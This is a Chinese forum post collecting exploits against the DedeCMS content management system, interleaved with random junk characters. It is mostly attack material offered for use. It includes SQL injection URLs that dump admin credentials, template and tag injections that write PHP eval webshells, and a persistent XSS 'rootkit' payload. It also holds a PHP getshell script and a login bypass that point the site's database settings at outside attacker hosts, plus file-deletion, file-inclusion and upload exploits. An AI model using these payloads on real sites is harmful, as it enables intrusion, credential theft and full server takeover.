dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞
; Q' w* i2 v8 O% Khttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=19 m, l" h4 D  R/ |/ ]6 ~0 [
; p! v- G* E: B6 N9 d) H

) d, b  B# b6 ^3 \+ S8 M: m, h/ `) J# D8 W& _

6 Q. y3 C3 V9 u  `( L5 I# Z3 G- w6 c' }
- F: K$ y3 _5 n* t# x0 F
. j5 ^" _" h2 A
  f  V/ q8 A) y1 e) b9 |
DedeCms v5.6 嵌入恶意代码执行漏洞
) b# ^" w" p4 u注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}$ N  M! x; m" n1 ^! ]
发表后查看或修改即可执行
  O8 J! q% M$ Wa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}/ E! }, E# Q  z, r- {$ t0 b
生成x.php 密码xiao，直接生成一句话。: f+ n% b$ Z% w
' P/ u, ]8 o( }2 E, e0 G
# V5 ]- ?$ m; }- b+ @& A+ a5 @

' W* W# V+ q/ j
/ u- M7 b4 B' M: k* [- h. t! e# L( W! q% K. D8 ]6 h
4 f) A) @* G: T* m( S' f
6 H* p( Q5 g5 e: v% N5 z
  a% G, Z2 @9 r- X2 }" ^, m
Dede 5.6 GBK SQL注入漏洞
! {6 B! M+ C0 \* Bhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';7 k; B: ]* a; r/ l
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞# P$ m6 I* v* M
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
% w2 |8 l' a  ]/ X* X
" m8 l; B0 J8 R) }
2 E  {: H. m5 S6 J  `! X( q
$ M- q( C/ r( f! G- ~3 H* y) E" u9 ?' I$ q  A) n

+ Y+ T/ T6 A& S/ q- S: P7 \% J
# x: b( o. J1 ?9 l9 a* Z: hDEDECMS 全版本 gotopage变量XSS漏洞  ?; s  g) `/ f5 I( A
1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
% f- S2 z/ u# l; |5 i( fhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="$ R# F$ e0 d) f# j
+ f$ k! o9 u( B8 j4 e
+ G. y  ?, w% u: C  A: c2 d  t
2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。
( t8 N: o6 ^" X5 Shttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell7 _- Y7 @/ u1 @1 @0 e7 X; R
#!usr/bin/php -w' c: A* z, |! Y  c- i
<?php/ O; I2 X" F8 b7 Q+ ^0 Z
error_reporting(E_ERROR);) O- J* I# j* C! J" m6 n: @' n
set_time_limit(0);5 E8 g* `! q9 g# w
print_r('( c; m6 V4 H- M- X6 L
DEDEcms Variable Coverage3 T, q) r3 k5 `
Exploit Author: www.heixiaozi.comwww.webvul.com
);  `' N4 b3 n8 U* W
echo "\r\n";; {8 k5 F" Z1 A
if($argv[2]==null){. ^4 ?9 y8 ~' Y- O
print_r('6 j0 |5 g7 U: z; Z. [3 h+ s; ?
+---------------------------------------------------------------------------+
+ x9 P/ d! z- V7 bUsage: php '.$argv[0].' url aid path
1 s9 P- ^  Y& G) g8 q1 V$ V! Faid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
& D( E) O! f. @" aExample:
7 }5 ^& |6 \! ?6 W' o6 x7 Xphp '.$argv[0].' www.site.com 1 old
' s/ Q/ k. }* U: z2 T$ I- ^+---------------------------------------------------------------------------+
& L( c% b) k. {; A. J6 V');
$ v6 k0 U4 N" M8 l" ?% F/ kexit;! y1 h/ }. E( V8 H
}  q! S3 o3 c4 k) M
$url=$argv[1];4 d9 A# n3 Q5 G4 C) E2 K
$aid=$argv[2];
1 _3 X' i! O2 d8 i$path=$argv[3];
$ d- C5 h6 T) o. ^& y# i: ]/ Y: Y- p# Q$exp=Getshell($url,$aid,$path);4 u( p6 C% \' k
if (strpos($exp,"OK")>12){
* ~) x& y, `, y+ _3 techo "
' O$ y+ O4 f& m; q3 eExploit Success \n";0 h3 j# [* ?) `% `. f
if($aid==1)echo "* }# D+ Q, B0 ]6 v+ N# Q; A7 s
Shell:".$url."/$path/data/cache/fuck.php\n" ;4 M/ u' T9 W; g! _7 r% n" |

1 F  b2 K% u9 k2 r
* S* E) U5 }) E$ {if($aid==2)echo "
8 N( X! K- c" c: {5 P! JShell:".$url."/$path/fuck.php\n" ;
4 x- I" Q' N. p5 Y# }# Y, g+ U6 g. M7 o: n2 T
" N, g. x5 `$ K# p, B$ f
if($aid==3)echo "
3 O) {2 P' t$ l/ D! S. Q" G  LShell:".$url."/$path/plus/fuck.php\n";
' U% F, J/ ]* ^2 W9 Y( t1 X
: m, `! ?  w( H
* }+ y$ ]* t: A# ^' ]8 B7 [}else{
; V0 u" G# O6 b/ h- s0 decho "" Q) b7 p2 g% e
Exploit Failed \n";
" |- X+ z3 B/ w# s7 Q" }  O}) G4 u/ H1 ]; K) I6 }, v. S4 v
function Getshell($url,$aid,$path){
" u1 c! L9 g% r  ^$id=$aid;- O5 ?( g( N( d
$host=$url;1 |8 m; r% V! i+ o' t& j
$port="80";
& L' e2 Q" \/ Y! T9 u% @$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
& Z1 T9 ^* u9 H$ S9 u; g$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";) T% E8 `% J. [' D
$data .= "Host: ".$host."\r\n";
- X) a1 r! ^% O4 [% h$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";. }  m) N( Y5 l  |# n, D
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
( ~9 g% ?. M' ?3 g$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
' ?3 ^( p; X* ~//$data .= "Accept-Encoding: gzip,deflate\r\n";
9 D" p4 \. ^$ u) Y! Y2 J4 w$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
2 U; s0 r/ \; O; S* |' @5 T2 _$data .= "Connection: keep-alive\r\n";3 R1 g+ K4 Z& H9 _5 a& C- Q/ C
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
# j# K' ]2 z7 u: g* s3 Q$data .= "Content-Length: ".strlen($content)."\r\n\r\n";: v: X. K! `+ S  l
$data .= $content."\r\n";
- v7 b# `/ t7 e+ q( N$ock=fsockopen($host,$port);/ T9 }: S4 x, v& s
if (!$ock) {
1 q8 [) m* o( K% P8 q. N/ Hecho "
6 b8 j9 K2 b1 z8 |- L) k* M+ eNo response from ".$host."\n";# Z  Y8 [! q; @# m
}$ ]& \+ C; M6 [" o; t
fwrite($ock,$data);  ~2 F% w3 c" m& }- o+ G
while (!feof($ock)) {, C8 [, w: f4 n1 J
$exp=fgets($ock, 1024);
% D' b/ r( X1 f/ v& nreturn $exp;
% [7 `4 c" Q0 n0 g0 Y& ~+ K}
8 G. A) u( d) B& ]/ j}
$ ]/ W; z( N8 G# b" |, {6 D: V
6 J# t# @! Z1 J5 j: k; _8 e
/ }. [  u" L0 {/ ~, y3 k?>
3 h& s( d) H* h+ c) @
- e' n3 z) S- K+ [; w
9 L: }3 c) Y# E7 L, w# P- N7 N: m$ j' V% B2 E0 ]. J1 K9 `, X5 F) B
3 P& x, f1 p! Z

* o- @& f1 S4 J0 J4 W) f) R; ^& A" I( D6 M! O

( l( r3 h" ?$ u  g, I* S/ W& u" Q/ H9 [3 t
! S. B6 |: L* b9 d* c) V0 Y" ^) x/ \0 U

, C# \) \" s& x( qDedeCms v5.6-5.7 越权访问漏洞(直接进入后台): `, C, \7 g& J  H0 M& t( n
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root' w+ R& Y) ?2 m4 i# X% {& H
$ E$ i8 c% I; _( c  |6 H5 |

6 V; ]4 ?/ S* d$ Z+ Q/ S把上面validate=dcug改为当前的验证码，即可直接进入网站后台
. X2 j) l7 P! I- A

* Y5 n2 e. c1 d* j& A此漏洞的前提是必须得到后台路径才能实现
, Y( I$ c; V" H. ]" _0 g$ G0 I5 R. d; q1 U/ t

2 m* p; O0 r* U+ H; O% P8 A  B% ]
2 r' s+ K* Q1 A$ q; |5 b+ u
: H" ^- Z; X6 Z& T$ y1 U7 n1 ]1 b) l; `0 }1 t
% W% [  m' U* D8 w' a6 n# B1 n) }' }
( Y2 [7 ?) v* e8 C1 x3 V
2 f) V+ t2 H0 z
1 R! Y6 Z2 B3 p( J) I

. B& x- E# }; t5 l. mDedecms织梦标签远程文件写入漏洞
8 U& J. _0 y& Z% a6 `% j" p# E1 D前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
4 ]+ C0 j- v% q0 s2 A( N# H3 D6 u0 h$ l; `7 c, r: h
' b2 N9 U) l- g5 j; U
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
! l" c7 c( x9 s2 O- |$ ?3 d2 \4 l0 |<form action="" method="post" name="QuickSearch" id="QuickSearch">! Z( G" q# p2 {$ ]6 M& x' M
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
1 H1 }. u; p$ K# w( U<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
; m* H: x! w1 J" e* z<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
" R: X. Q3 b3 q) M* ?<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />. p, z; n4 l* O. _: ~9 v8 I- J
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />7 f' C8 |1 S! G4 J4 j
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />" D, q# F6 z  R4 `+ O
<input type="text" value="true" name="nocache" style="width:400">: }6 V  s! v& \# E" Y% c: I8 w
<input type="submit" value="提交" name="QuickSearchBtn"><br />
$ a. c+ ?& Y# K+ x6 _</form>
# D( A8 U* A0 v5 m<script>
$ Z+ P4 F) t% H8 v7 D) i' [8 |+ k! Qfunction addaction()8 d. b* I* a9 C& t' V
{' a$ f' X& D* k( X
document.QuickSearch.action=document.QuickSearch.doaction.value;
5 p' l' V7 h& L: C8 r& o# z}: G9 o7 f* {+ y  ]2 a: [8 |
</script>
5 J8 L! G! `/ E: \9 ^7 @
- _5 B' ]- l/ x: F% n' b6 B1 m# {0 n+ d: s6 K" C9 H) @! K9 ^* u

8 [! Y0 \  i4 r3 S, e4 a- ~
( w: M/ p: Q$ O" {, J& {; y/ h2 g- S- _# v: ^

9 S5 o- q2 F) s# b% t: p( T* L3 l2 [" W0 {6 U6 @+ |. U
2 ~+ K4 \" u$ C

9 M; t/ Z. D0 o: }3 U9 F7 p9 T. Y, v" v* {! m" P8 f( v1 ]
DedeCms v5.6 嵌入恶意代码执行漏洞
% A# Y; e3 f  N注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行, f' ~& L) F1 R, Y( y5 X
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
+ q* P" c' w+ k$ R( e生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得
  [7 N; ?9 z$ Z5 Y6 u  K% ?Dedecms <= V5.6 Final模板执行漏洞
1 A  i0 I$ w( H# V4 w6 f# X注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
5 X6 P, V) S) c. K7 n; a: cuploads/userup/2/12OMX04-15A.jpg$ B* A& G7 D: s

& b$ j* B3 W9 W$ J0 _0 V2 `
& i: M1 Z9 w$ ?# u8 p! w, ?模板内容是（如果限制图片格式，加gif89a）：1 Y- a  s5 ^! \8 A( n- ^2 b* N
{dede:name runphp='yes'}( B' N- K: t* o. u: r: V
$fp = @fopen("1.php", 'a');
- ^4 ~1 e/ |% z8 \# @@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
; n. b' f8 ]2 W" e7 b@fclose($fp);- c+ i' P% n- ^, H$ [6 r
{/dede:name}
; a/ B4 T" _  f3 P' z+ r: z2 修改刚刚发表的文章，查看源文件，构造一个表单：
; \: R6 Z9 V4 y8 P* b; O' K: p<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">6 q" S) u& _! u8 n! x
<input type="hidden" name="dopost" value="save" />) M- R2 `6 B1 ^8 k9 ^
<input type="hidden" name="aid" value="2" />
' {5 i1 q) C, F, m3 t7 W<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
% Z) Z+ K& ^# z' F2 E) X<input type="hidden" name="channelid" value="1" />. m3 o! `( x3 ~# w  T4 m
<input type="hidden" name="oldlitpic" value="" />
+ p' e$ j4 Z! w6 c* E<input type="hidden" name="sortrank" value="1275972263" />2 H- x) G) n& @5 d, S1 k

  \2 X. v! f. S3 b( \" M& Q! ~- J% L4 C
<div id="mainCp">0 Q0 g, a8 p- d, q  U
<h3 class="meTitle"><strong>修改文章</strong></h3>1 L5 H1 r7 g$ V# Q* W: {/ H
- ~9 E6 L. s; Q9 k' J; [

' j, r8 k! Z2 P  C4 D- ?<div class="postForm">! s' T) Z$ s0 l9 |5 q8 I6 U
<label>标题：</label>9 ^% g. L! q" p. d+ W* E8 V
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>* R# \1 C# ?, g5 q: w( `" T
# q: W* \: W% Q- H; W- I! _

' g  }$ u' G& V<label>标签TAG：</label>- @! h" H. v+ q4 O% W7 S
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
- }* K  r: [" X" G+ N5 I+ ]" b0 G  d

* T% r: F3 z0 M! e; H- E<label>作者：</label>$ r0 E4 \/ L. o
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
" ]' W* g* k  U- t$ u$ ]
* H0 f9 m) V0 |5 u+ e2 {7 J: y. u8 m) T! @8 d  _/ ]
<label>隶属栏目：</label>
2 k) ~, Y# ]! j# O# u/ F9 h3 E# y<select name='typeid' size='1'>( Y2 E# M! q' ~+ [
<option value='1' class='option3' selected=''>测试栏目</option>' ~$ T( g5 Y5 I; W  D9 c  X3 K
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
  r' N3 Q2 @" X) p/ S
3 c0 O4 r. g! Z% {; ]! g9 b. x  h. i$ G- Y% F8 ^. D2 \
<label>我的分类：</label>, Z( s' j6 P+ Y+ I9 d
<select name='mtypesid' size='1'>
( P& v5 P& X4 V7 _5 Z( x<option value='0' selected>请选择分类...</option>" T* A  O! z( a" H
<option value='1' class='option3' selected>hahahha</option>
$ ^4 f! S9 r7 e/ G' ~</select>5 j$ @. H, f, p+ Y3 B$ g
1 O+ }6 G9 M5 L- l$ o

4 o0 [2 y. C" X7 `/ m<label>信息摘要：</label>
) _2 d. N: Z% P3 w. _<textarea name="description" id="description">1111111</textarea>: Q! i% J+ a$ ?% ~' [, ?: |( A! q0 E. ^
(内容的简要说明)
- G+ Z* |. M6 R+ p  h$ D7 X
. S# H# n) K& ~! J0 ~. y
: I9 y$ j. O; a1 I) I' }; i0 R" K<label>缩略图：</label>
* a9 |% A$ H! c' T) f2 W; T<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
) U5 e; x. |# v  J4 h$ c6 f: d( k4 f- _) F$ _

1 S' G% t8 q1 x" b0 i<input type='text' name='templet'
/ O3 |9 S/ ^8 ]value="../ uploads/userup/2/12OMX04-15A.jpg">; }: D/ |3 h  N& r  z- |3 ~: q
<input type='text' name='dede_addonfields'
0 [" }0 s9 H6 e" y) i6 _  s# E$ [5 |value="templet,htmltext;">（这里构造）( W( n  q; `# ?- ^: D) \' G8 P
</div>' Q* o2 V4 Y# B! u" R, v) L
3 H% [6 d0 c; a4 l- z" J3 b' P- M

, D7 Y; N# m: u& E6 V- |: {! V; f$ M; x1 {" a# j+ C$ t1 S5 [
<h3 class="meTitle">详细内容</h3>3 I) ^" `" s: ~6 V9 u6 ]* G: ^, [
* _; ?" l; A$ k1 _# c1 C

; F; ^, y9 v. r' S: ~<div class="contentShow postForm">; x/ ^1 c% [/ i" t
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
0 m" ^2 `; i* p# A( s9 N
4 F/ [, n3 M: F* K' a: j5 _$ C
5 d' z. I$ q) ]7 ^$ C1 E. X<label>验证码：</label>
) I! @, H% ~+ p) I% c' L<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
' Q6 g+ M7 F4 |<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
0 ?# _2 f/ F) a& Z4 d
1 |! a6 A* a" L5 N3 u" r4 i
2 t7 p5 a) ^4 H4 c" U0 u  h% Z<button class="button2" type="submit">提交</button>/ G* N4 |( S4 U/ b( `; h- j
<button class="button2 ml10" type="reset">重置</button>1 I4 m" `6 @3 S0 k# I7 K; i7 ~
</div>5 x7 n: E" ]9 X* n
& L- {3 [/ d, e0 B' C8 E" o; t2 J
3 E* P5 C! U4 d4 K/ G' a+ @1 W
</div>
% K) V. d. S6 [/ S% h- k
- I6 H2 B! J( Z; M: E6 |8 G" a7 Z& b0 P- _# G
</form>2 Z' Q8 N/ n$ K5 r* i7 G( _' ?
4 d" E3 d2 F6 E) C
& O$ E0 t  k* n+ v* S* |: g+ J
提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：( K3 N6 R: [' {8 F" r) Z. u  Y
假设刚刚修改的文章的aid为2，则我们只需要访问：* S" s- M- N% F+ T$ s/ L9 y
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php
3 x, u) ?; o0 e  v
. z, O) c7 G+ d( F4 B( }5 ~* s. Q2 g  |) ^
7 e3 A) r2 z; {0 v; D
# A5 w9 a$ a9 Z- `% L( a; m5 G

2 [5 ?: W. x  z( H' J% ~1 }+ m  ~  c3 [: W6 [; m6 o

- j" R8 ]* }2 H0 Z
& @  ^0 P/ D  ^8 g( Z6 j, {
7 Q) s  m% E. h$ n
8 ^* C1 c- K3 H1 F5 t2 ~9 D9 k3 i
( \3 G# k6 C; W' O, K2 i
. X  F# r  ~( oDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
1 y3 C  e  F' \Gif89a{dede:field name='toby57' runphp='yes'}
6 y( X  P& Z% g5 m+ Y- g: e' ?phpinfo();
% F1 m4 e$ h+ ^$ h# S2 A% y4 \$ ]{/dede:field}8 Y8 u0 Z& F7 P0 Y
保存为1.gif4 f1 e0 s0 l) _8 m* r9 K4 B
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
) Z- M* D8 c# b: T/ [<input type="hidden" name="aid" value="7" />
+ ^9 e( q/ [: F<input type="hidden" name="mediatype" value="1" />
3 {! d, f( l, ]$ H<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
# t, P- Y8 E# b. M! Y% i<input type="hidden" name="dopost" value="save" /> # E5 B# a4 t, [0 A7 X
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> , O- n9 e% I: }: h- @% g
<input name="addonfile" type="file" id="addonfile"/> 3 r0 n+ L. N, P  ?- K3 c* l- E- S
<button class="button2" type="submit" >更改</button> 6 r, V$ H( B6 x+ @
</form>
# }2 {3 u( Z7 n- A# }1 y( X) q* m8 t- H, _

$ J; g8 w; n1 V' h+ O0 L1 |$ y构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
; K* E: F- o$ p3 {0 w; A! K0 }+ C发表文章，然后构造修改表单如下：
% z& x( Z9 Q  e* |' |) O
- [9 G6 x4 o1 h0 q6 d# z# j
) b2 R& K# x1 X& q8 A" _; n. N$ x3 Q<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 8 M2 U4 H1 W7 O* n, K, o
<input type="hidden" name="dopost" value="save" /> ( M" W% ~- K& M$ `* _" j. P
<input type="hidden" name="aid" value="2" />
. R4 E& Z: E; Q8 o<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
7 G- T3 s* Q# t$ W& j8 Z  D' X1 D<input type="hidden" name="channelid" value="1" /> 8 i3 O' V# O9 R& y. A
<input type="hidden" name="oldlitpic" value="" />
4 S4 X, q. @4 B' f+ O, @<input type="hidden" name="sortrank" value="1282049150" /> 3 }, {1 s( T% L$ L" `# T4 c
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> - n1 x: n+ `& Z% Z7 f
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
2 c) `& B4 r  B+ c' c<select name='typeid' size='1'>
/ t0 o/ K7 c2 }, V* k7 d<option value='1' class='option3' selected=''>Test</option>
6 N7 c0 O) q9 g" Z<select name='mtypesid' size='1'> : |, ?# V. v+ ?
<option value='0' selected>请选择分类...</option>
% H. \# B8 u* \, E' Y. A! z+ z<option value='1' class='option3' selected>aa</option></select> + q2 W: m' D1 U8 {" j9 K
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
) ]& U9 g4 @, z2 U' H<input type='hidden' name='dede_addonfields' value="templet">
9 w$ f$ W2 d' v1 {8 _8 l. L! f$ H<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> " e. k& {7 n" T0 I% X7 _8 R
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> / Q- x; v' B& P
<button class="button2" type="submit">提交</button>
% e+ P- p% p; p( j4 R4 H</form>
+ A5 M  w4 j/ Y3 D
5 {+ Y; a9 L% c) v+ R# T# H" i/ W" _1 ^3 v' X) J2 L# I
1 f, A2 p4 A/ K" ]; o6 `

6 C5 Y# P% q3 N; e% @8 c/ p& w( p! l, Y/ H

( O+ {3 L( q1 G' u6 D, e3 O, c) X5 E. i9 Q) T

& k7 N* v2 N6 ?) c! w8 p/ Z: w1 T* p% A6 o3 C7 I7 e- q+ h

1 j" q# \3 ~8 q. j  ~/ c
& }5 U' d0 c/ d  w2 t* Q- o7 `* J- }0 d& Y/ \
织梦(Dedecms)V5.6 远程文件删除漏洞
! {. K' b4 o6 b3 H, ^http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 / q* T# T' I- P* ?
http://www.test.com/plus/carbuya ... urn&code=../../' B9 v+ S5 g5 W& Y1 W# K% P6 ^

) N& m& C5 _0 J# r  b: {/ j4 [0 N0 [( W7 r8 j
: Z: D) @5 h7 z  Q5 L
* }" B, O+ {' U/ [7 P) O0 N

8 p' h9 [8 F. p* Z0 b" \8 |
! a9 `0 O9 l5 t0 X- Y1 g' `8 N; I3 ^
4 f8 e, V0 ]. T
" l, i  u( w) N. S, `7 o1 ?+ m

$ l. z) @2 z" G6 h* i5 f$ o) H4 Z- }DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
& Z2 g- ^1 _3 Z3 J, g3 ]& Pplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`4 a" J. c9 U& T0 H( {3 _
密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5. C8 V& a; h) {6 z1 K* Q7 a  |
, S: y5 x9 A) L/ i% j& }

+ V5 U9 U; k# ?( |7 t
, b0 y: A( ^4 M, V& }8 e$ U, T' h" t7 }; \# K+ _( H" a

0 {! G. ^- \9 N, y3 W
5 S" @8 F' I+ i* V/ V- j! {/ p6 G+ a; f* P

  [9 D2 w" y! @! ?
+ h/ j) w/ N( b6 X4 y- \9 B8 t7 d7 S) V
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞, V1 @7 e" }2 S, h( q
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
3 A" w; l" m' o
6 G! D8 i9 h! K2 D
. ]1 `0 H/ G8 _( O8 X4 A$ l. }# [" T9 m1 d% r1 Y

( W$ }7 n9 }+ ~; [) c. f1 W! \0 ^/ Z- L
6 q' N3 h- p+ e4 Q  X/ }
* N* Q: C4 j* ]2 P: ~
/ [8 x3 S  ?0 D) L; Z

3 ^4 w4 F/ i% u0 v4 n7 m6 |
) {3 r! D4 b. t. ?. p. V织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
) N6 j1 U; ~% e3 Q8 G/ ^2 L2 q<html>
- L: h4 Q# G4 p<head>2 ?# N; n$ |" C/ U: x7 q
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
- t" e& L8 v1 u8 m</head>
+ s5 A( S& V& Z5 n6 }- R<body style="FONT-SIZE: 9pt">* T8 m9 k; ~* ^# Q
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
  ^  w; g( {; @/ w/ D/ e<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>( b! [) h9 l& @9 D8 @
<input type='hidden' name='activepath' value='/data/cache/' />
. b2 G7 T/ F) V/ p& p+ }2 T<input type='hidden' name='cfg_basedir' value='../../' />
" `3 V% w. G  \9 A4 M<input type='hidden' name='cfg_imgtype' value='php' />
+ |) Y, U* [* j$ g, }5 d% [<input type='hidden' name='cfg_not_allowall' value='txt' />- I3 z2 Q7 T% _% l, g8 R% M4 L) T
<input type='hidden' name='cfg_softtype' value='php' />! u/ s4 Y. ]6 N, o$ U, v$ \, P
